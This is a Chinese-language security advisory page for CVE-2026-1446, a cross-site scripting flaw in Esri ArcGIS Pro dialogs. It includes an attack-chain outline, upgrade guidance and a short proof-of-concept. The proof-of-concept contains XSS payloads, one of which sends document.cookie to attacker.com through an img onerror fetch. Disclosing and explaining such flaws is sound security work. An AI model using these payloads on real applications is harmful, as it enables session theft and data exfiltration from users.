CVE-2026-1446 CVSS 5.0 中危

CVE-2026-1446: Esri ArcGIS Pro 跨站脚本(XSS)漏洞

披露日期: 2026-01-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1446

漏洞类型

跨站脚本(XSS)

CVSS评分

5.0 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Esri ArcGIS Pro

漏洞概述

CVE-2026-1446是Esri ArcGIS Pro桌面应用程序中的一个跨站脚本(XSS)安全漏洞。该漏洞影响ArcGIS Pro 3.6.0及更早版本。由于ArcGIS Pro是桌面应用程序，漏洞利用范围限于本地用户与应用程序交互的场景，无需特权角色或高于标准本地用户访问权限的权限即可实施攻击。攻击者可通过向应用程序注入恶意字符串，当用户在ArcGIS Pro中打开特定对话框时，这些恶意内容可能被渲染和执行，从而导致客户端代码注入攻击。此漏洞已在ArcGIS Pro 3.6.1版本中得到修复。

技术细节

该漏洞是一个存储型或反射型XSS漏洞，存在于ArcGIS Pro的特定对话框组件中。攻击者通过构造包含恶意JavaScript代码的字符串，利用应用程序对用户输入的不当处理和输出渲染机制，在受害者打开特定对话框时触发执行。攻击者需要具备本地用户访问权限，能够与ArcGIS Pro应用程序进行交互。由于该应用是桌面软件，攻击向量为本地(AV:L)，且需要用户交互(UI:R)才能触发漏洞利用。CVSS 3.1向量显示其影响范围包括机密性(C:L)和完整性(I:L)的低级别影响，但可用性(A:N)无影响。攻击者成功利用后可窃取用户会话信息、窃取敏感数据或执行其他客户端恶意操作。

攻击链分析

STEP 1

步骤1

攻击者获得本地用户访问权限，登录到运行ArcGIS Pro的系统

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload字符串

STEP 3

步骤3

通过项目文件、元数据字段、图层属性等渠道将恶意字符串注入到ArcGIS Pro应用程序中

STEP 4

步骤4

等待受害者打开ArcGIS Pro中受影响的特定对话框

STEP 5

步骤5

当对话框渲染用户输入时，恶意代码在应用程序上下文中执行

STEP 6

步骤6

攻击者成功窃取敏感信息、执行未授权操作或进一步渗透系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-1446 XSS PoC for Esri ArcGIS Pro 3.6.0
// This PoC demonstrates the XSS vulnerability in ArcGIS Pro dialogs
// Note: This is a conceptual PoC for educational purposes

// Malicious payload that could be injected
var xssPayload = '<script>alert("XSS - CVE-2026-1446")</script>';

// Example attack scenario:
// 1. Attacker with local access crafts malicious string
// 2. The string is stored or passed to ArcGIS Pro
// 3. When victim opens specific dialog (e.g., project properties, metadata editor)
// 4. The XSS payload gets rendered without proper sanitization
// 5. JavaScript code executes in the context of the application

// Simulated injection point (hypothetical)
function exploitArcGISPro(targetInput) {
    // Inject malicious content
    var maliciousString = '<img src=x onerror="fetch(\'http://attacker.com/steal?cookie=\'+document.cookie)">';
    
    // In actual exploitation:
    // - This would be passed through project files, metadata fields, or layer properties
    // - When the dialog renders this content, XSS triggers
    
    console.log('Malicious payload prepared:', maliciousString);
    return maliciousString;
}

// Mitigation check
function checkVersion() {
    var affectedVersion = '3.6.0';
    var fixedVersion = '3.6.1';
    console.log('Affected versions: <=' + affectedVersion);
    console.log('Fixed in version: ' + fixedVersion);
}

影响范围

Esri ArcGIS Pro <= 3.6.0

防御指南

临时缓解措施

立即将ArcGIS Pro升级到3.6.1版本以消除该漏洞。如果暂时无法升级，应限制对ArcGIS Pro应用程序的访问，仅允许受信任的用户使用。同时，在使用应用程序时避免打开来源不明的项目文件或元数据，以减少潜在的XSS攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表